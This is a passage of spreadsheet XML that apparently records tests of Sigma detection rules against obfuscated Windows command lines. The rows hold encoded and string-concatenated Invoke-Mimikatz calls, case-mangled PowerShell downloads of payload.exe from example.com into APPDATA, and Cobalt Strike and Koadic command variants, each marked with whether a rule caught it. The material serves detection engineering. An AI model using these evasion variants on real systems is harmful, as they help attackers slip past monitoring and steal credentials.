      </c>
      <c r="G4337" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4337" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I433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337" s="43" t="n"/>
      <c r="K4337" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4338" ht="15.75" customHeight="1" s="42">
      <c r="A4338" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4338" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4338" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4338" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4338" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F4338" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4338" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4338" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4338" s="43" t="n"/>
      <c r="J4338" s="43" t="n"/>
      <c r="K4338" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4339" ht="15.75" customHeight="1" s="42">
      <c r="A4339" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4339" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4339" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4339" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4339" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F4339" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4339" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4339" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4339" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J4339" s="43" t="n"/>
      <c r="K4339" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4340" ht="15.75" customHeight="1" s="42">
      <c r="A4340" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4340" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4340" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4340" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4340" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F4340" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4340" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4340" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4340" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J4340" s="43" t="n"/>
      <c r="K4340" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4341" ht="15.75" customHeight="1" s="42">
      <c r="A4341" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4341" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4341" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4341" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4341" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F4341" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4341" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4341" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4341" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4341" s="43" t="n"/>
      <c r="K4341" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4342" ht="15.75" customHeight="1" s="42">
      <c r="A4342" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4342" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4342" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4342" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4342" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F4342" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4342" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4342" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4342" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4342" s="43" t="n"/>
      <c r="K4342" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4343" ht="15.75" customHeight="1" s="42">
      <c r="A4343" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4343" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4343" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4343" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4343" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodeDcommANd SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F4343" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4343" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4343" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4343" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4343" s="43" t="n"/>
      <c r="K4343" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4344" ht="15.75" customHeight="1" s="42">
      <c r="A4344" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4344" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4344" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4344" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4344" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eNcoDedcoMmAND SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F4344" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4344" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4344" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4344" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J4344" s="43" t="n"/>
      <c r="K4344" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4345" ht="15.75" customHeight="1" s="42">
      <c r="A4345" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4345" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4345" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4345" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4345" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F4345" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4345" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4345" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4345" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J4345" s="43" t="n"/>
      <c r="K4345" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4346" ht="15.75" customHeight="1" s="42">
      <c r="A4346" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4346" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_gather_network_info_execution</t>
        </is>
      </c>
      <c r="C4346" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D4346" s="43" t="inlineStr">
        <is>
          <t>07aa184a-870d-413d-893a-157f317f6f58</t>
        </is>
      </c>
      <c r="E4346" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set str1=gather &amp; set str2=NetworkInfo.vbs &amp; call wscript.exe C:\Windows\System32\%str1%%str2%"</t>
        </is>
      </c>
      <c r="F4346" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4346" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4346" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4346" s="43" t="n"/>
      <c r="J4346" s="43" t="n"/>
      <c r="K4346" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4347" ht="15.75" customHeight="1" s="42">
      <c r="A4347" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4347" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4347" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4347" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4347" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F4347" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4347" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4347" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4347" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4347" s="43" t="n"/>
      <c r="K4347" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4348" ht="15.75" customHeight="1" s="42">
      <c r="A4348" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4348" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4348" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4348" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4348" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F4348" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4348" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4348" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4348" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4348" s="43" t="n"/>
      <c r="K4348" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4349" ht="15.75" customHeight="1" s="42">
      <c r="A4349" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4349" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4349" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4349" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4349" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F4349" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4349" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4349" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4349" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4349" s="43" t="n"/>
      <c r="K4349" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4350" ht="15.75" customHeight="1" s="42">
      <c r="A4350" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4350" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4350" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4350" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4350" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile " $env:APPDATA\payload.exe""</t>
        </is>
      </c>
      <c r="F4350" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4350" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4350" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4350" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4350" s="43" t="n"/>
      <c r="K4350" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4351" ht="15.75" customHeight="1" s="42">
      <c r="A4351" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4351" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4351" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4351" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4351" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -COMmANd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile " $env:APPDATA\payload.exe""</t>
        </is>
      </c>
      <c r="F4351" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4351" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4351" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4351" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4351" s="43" t="n"/>
      <c r="K4351" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4352" ht="15.75" customHeight="1" s="42">
      <c r="A4352" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4352" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4352" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4352" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4352" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile " $env:APPDATA\payload.exe""</t>
        </is>
      </c>
      <c r="F4352" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4352" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4352" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4352" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4352" s="43" t="n"/>
      <c r="K4352" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4353" ht="15.75" customHeight="1" s="42">
      <c r="A4353" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4353" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4353" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4353" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4353" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile " $env:APPDATA\payload.exe""</t>
        </is>
      </c>
      <c r="F4353" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4353" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4353" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4353" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4353" s="43" t="n"/>
      <c r="K4353" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4354" ht="15.75" customHeight="1" s="42">
      <c r="A4354" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4354" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4354" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4354" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4354" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAND "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile " $env:APPDATA\payload.exe""</t>
        </is>
      </c>
      <c r="F4354" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4354" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4354" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4354" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4354" s="43" t="n"/>
      <c r="K4354" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4355" ht="15.75" customHeight="1" s="42">
      <c r="A4355" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4355" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_path_traversal</t>
        </is>
      </c>
      <c r="C4355" s="43" t="inlineStr">
        <is>
          <t>Potential CommandLine Path Traversal Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D4355" s="43" t="inlineStr">
        <is>
          <t>087790e3-3287-436c-bccf-cbd0184a7db1</t>
        </is>
      </c>
      <c r="E4355" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "..\..\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F4355" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4355" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4355" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4355" s="43" t="inlineStr">
        <is>
          <t>Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J4355" s="43" t="n"/>
      <c r="K4355" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4356" ht="15.75" customHeight="1" s="42">
      <c r="A4356" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4356" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_path_traversal</t>
        </is>
      </c>
      <c r="C4356" s="43" t="inlineStr">
        <is>
          <t>Potential CommandLine Path Traversal Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D4356" s="43" t="inlineStr">
        <is>
          <t>087790e3-3287-436c-bccf-cbd0184a7db1</t>
        </is>
      </c>
      <c r="E4356" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C "..\..\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F4356" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4356" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4356" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4356" s="43" t="inlineStr">
        <is>
          <t>Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J4356" s="43" t="n"/>
      <c r="K4356" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4357" ht="15.75" customHeight="1" s="42">
      <c r="A4357" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4357" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_modules</t>
        </is>
      </c>
      <c r="C4357" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Modules</t>
        </is>
      </c>
      <c r="D4357" s="43" t="inlineStr">
        <is>
          <t>4f154fb6-27d1-4813-a759-78b93e0b9c48</t>
        </is>
      </c>
      <c r="E4357" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set a=Invoke-&amp;set b=UserHunter&amp;call powershell -c %a%%b%"</t>
        </is>
      </c>
      <c r="F4357" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4357" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4357" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4357" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc)</t>
        </is>
      </c>
      <c r="J4357" s="43" t="n"/>
      <c r="K4357" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4358" ht="15.75" customHeight="1" s="42">
      <c r="A4358" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4358" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C4358" s="43" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D4358" s="43" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E4358" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /q /c "ch""cp" 1252</t>
        </is>
      </c>
      <c r="F4358" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4358" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4358" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4358" s="43" t="n"/>
      <c r="J4358" s="43" t="n"/>
      <c r="K4358" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4359" ht="15.75" customHeight="1" s="42">
      <c r="A4359" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4359" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4359" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4359" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4359" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile "$env:APPDATA\payload.exe""</t>
        </is>
      </c>
      <c r="F4359" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4359" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4359" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4359" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J4359" s="43" t="n"/>
      <c r="K4359" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4360" ht="15.75" customHeight="1" s="42">
      <c r="A4360" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4360" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C4360" s="43" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D4360" s="43" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E4360" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile " $env:APPDATA\payload.exe""</t>
        </is>
      </c>
      <c r="F4360" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4360" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4360" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4360" s="43" t="inlineStr">
        <is>
